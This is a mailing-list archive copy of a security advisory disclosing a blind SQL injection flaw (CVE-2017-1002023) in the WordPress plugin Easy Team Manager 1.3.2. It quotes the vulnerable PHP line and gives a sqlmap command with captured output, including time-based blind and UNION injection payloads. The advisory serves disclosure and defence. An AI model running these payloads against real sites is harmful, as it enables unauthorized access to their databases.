oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 30 May 2017 18:46:16 -0400
Title: Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-24
CVE-ID:[CVE-2017-1002023]
Download Site: https://wordpress.org/plugins/easy-team-manager/
Vendor: https://daisythemes.com/
Vendor Notified: 2017-05-24
Vendor Contact: web form contact
Advisory: http://www.vapidlabs.com/advisory.php?v=194
Description: Easy Team Manager helps you to create team members with their short descriptions, social profiles link 
with smooth hover effects.
Vulnerability:
The following code does not sanitize $_GET['id'] before making it part of an SQL statement in file 
./easy-team-manager/inc/easy_team_manager_desc_edit.php:

85-        global $wpdb;        
86-        $easy_team_manager_desc = $wpdb->get_results("SELECT *from ".$wpdb->prefix."easy_team_manager_description 
where id=".$_GET['id']);
87-             foreach ($easy_team_manager_desc as $s ){
88-                     $ind_name_detail = unserialize($s->name);
89-                     $socia_media = unserialize($s->social_media);
90:                     $id=$_GET['id'];
91-                     $ind_position = esc_attr($s->position);
92-                     $ind_image=$s->image;
93-                     $ind_email_detail = unserialize($s->email);
94-                     $ind_phone_detail = unserialize($s->phone);
95-                     $ind_desc = esc_attr(stripcslashes($s->ind_description));

This allows blind SQL injection via the id parameter by an authenticated user with edit team priveledges. 

Exploit Code:
        • $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*&apos; 
--load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql
        •  
        • [08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
        • URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
        • sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
        • ---
        • Parameter: #1* (URI)
        •     Type: AND/OR time-based blind
        •     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        •     Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN 
(3623=3623) THEN SLEEP(5) ELSE 3623 END)
        •     Type: UNION query
        •     Title: MySQL UNION query (84) - 5 columns
        •     Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION 
ALL SELECT 
84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
        • ---
        • [08:39:15] [INFO] the back-end DBMS is MySQL
        • web server operating system: Linux Ubuntu 16.04 (xenial)
        • web application technology
        • : Apache 2.4.18
        • back-end DBMS: MySQL >= 5.0.12
        • [08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
        •  
        • [*] shutting down at 08:39:15
Previous By Date Next
Previous By Thread Next

Current thread: